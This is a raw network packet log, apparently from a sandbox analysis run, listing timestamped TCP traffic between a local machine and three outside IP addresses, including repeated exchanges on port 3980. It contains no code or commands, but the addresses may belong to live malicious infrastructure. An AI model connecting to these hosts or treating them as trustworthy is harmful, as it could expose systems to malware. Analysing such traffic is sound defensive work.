                                    Jul 1, 2024 15:37:41.271014929 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.271073103 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.271717072 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.271792889 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.271996975 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.272061110 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.272617102 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.272682905 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.272922993 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.272979975 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.273616076 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.273683071 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.273772001 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.273837090 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.301409960 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301525116 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301561117 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.301578999 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301592112 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.301704884 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301769018 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.301774979 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301882029 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301945925 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.301950932 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.301995993 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.360780001 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.360853910 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.360898972 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.360914946 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.360960007 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.360979080 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.361109018 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.361160040 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.361167908 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.361172915 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.361207962 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.361361027 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.361429930 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.362046003 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.362112999 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.362119913 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.362132072 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.362166882 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.362421036 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.362421036 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:41.362442970 CEST44350573192.185.112.252192.168.2.6
                                    Jul 1, 2024 15:37:41.363619089 CEST50573443192.168.2.6192.185.112.252
                                    Jul 1, 2024 15:37:44.149398088 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:44.154200077 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:44.154305935 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:44.155641079 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:44.162282944 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.014656067 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.016680956 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.021589994 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.177974939 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.182832003 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.188236952 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.188298941 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.188352108 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.193267107 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.198591948 CEST5057780192.168.2.6178.237.33.50
                                    Jul 1, 2024 15:37:45.203778982 CEST8050577178.237.33.50192.168.2.6
                                    Jul 1, 2024 15:37:45.203871965 CEST5057780192.168.2.6178.237.33.50
                                    Jul 1, 2024 15:37:45.204226017 CEST5057780192.168.2.6178.237.33.50
                                    Jul 1, 2024 15:37:45.209038019 CEST8050577178.237.33.50192.168.2.6
                                    Jul 1, 2024 15:37:45.223704100 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.819899082 CEST8050577178.237.33.50192.168.2.6
                                    Jul 1, 2024 15:37:45.821877003 CEST5057780192.168.2.6178.237.33.50
                                    Jul 1, 2024 15:37:45.856496096 CEST505753980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.861680984 CEST398050575206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.888940096 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.888955116 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.888984919 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889023066 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.889077902 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889091015 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889102936 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889115095 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889125109 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.889127016 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889138937 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889151096 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.889164925 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.889185905 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.889199018 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.893956900 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.893981934 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.894049883 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:45.988327980 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.988352060 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:45.988446951 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.011444092 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011614084 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011625051 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011636019 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011650085 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011662006 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011662960 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.011681080 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.011723042 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.012116909 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012156010 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012167931 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012180090 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012198925 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.012223005 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.012746096 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012790918 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.012868881 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012881041 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012892008 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.012914896 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.013885975 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.013919115 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.013931990 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.013961077 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.013974905 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.013983965 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.014015913 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.014051914 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.014307022 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.014318943 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.014328957 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.014348030 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.066932917 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.101933956 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.101947069 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.101959944 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.102015018 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134452105 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134468079 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134483099 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134550095 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134548903 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134567022 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134591103 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134629965 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134733915 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134747028 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134757996 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134772062 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134808064 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134830952 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134836912 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.134845018 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.134895086 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.135433912 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135453939 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135467052 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135478973 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135497093 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.135529995 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.135947943 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135987997 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.135999918 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136038065 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.136071920 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136082888 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136095047 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136111975 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.136147976 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.136512995 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136533022 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136543989 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136579037 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.136657000 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136667967 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136679888 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136692047 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.136696100 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.136709929 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.137388945 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137440920 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137454033 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137486935 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.137511015 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.137520075 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137532949 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137542963 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137557030 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.137578011 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.137607098 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.138266087 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.138305902 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.138317108 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.138349056 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.138371944 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.138384104 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.138406992 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.145505905 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.145555019 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.145564079 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.145576000 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.145586967 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.145620108 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.191950083 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.192559958 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.192632914 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.192643881 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.192655087 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.192693949 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.192702055 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.192739010 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.192751884 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.193665028 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.265307903 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.265389919 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.265399933 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.265412092 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.265465975 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.265506029 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.279886961 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.279973030 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.279985905 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280008078 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280019045 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280030012 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280030012 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280041933 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280064106 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280072927 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280075073 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280088902 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280101061 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280112982 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280119896 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280152082 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280275106 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280286074 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280328035 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280374050 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280384064 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280394077 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280436039 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280586958 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280633926 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280641079 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280646086 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280694962 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280726910 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280745029 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280751944 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280756950 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.280787945 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.280810118 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.281076908 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281126976 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281138897 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281207085 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281212091 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281217098 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281271935 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281285048 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281296015 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281306028 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.281367064 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.281776905 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281788111 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281800032 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281829119 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.281837940 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281846046 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.281851053 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281862974 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.281888008 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.282166004 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282226086 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282237053 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282277107 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.282303095 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282315969 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282330036 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282341003 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282366991 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.282385111 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.282404900 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282417059 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282427073 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282439947 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282452106 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.282455921 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.282501936 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283226013 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283291101 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283304930 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283318043 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283335924 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283364058 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283369064 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283377886 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283404112 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283462048 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283473969 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283493042 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283499956 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283504963 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283519030 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283529997 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.283529997 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.283560038 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.284912109 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.284956932 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.284970045 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285005093 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285010099 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285022974 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285027981 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285073996 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285111904 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285166025 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285176992 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285212994 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285249949 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285265923 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285278082 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285289049 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285293102 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285301924 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285322905 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285336018 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285347939 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.285358906 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.285393953 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.360357046 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.360388041 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.360400915 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.360429049 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.360440969 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.360450029 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.360512972 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.370191097 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.370203018 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.370213985 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.370225906 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.370245934 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.370264053 CEST398050576206.123.148.194192.168.2.6
                                    Jul 1, 2024 15:37:46.370281935 CEST505763980192.168.2.6206.123.148.194
                                    Jul 1, 2024 15:37:46.370306969 CEST505763980192.168.2.6206.123.148.194
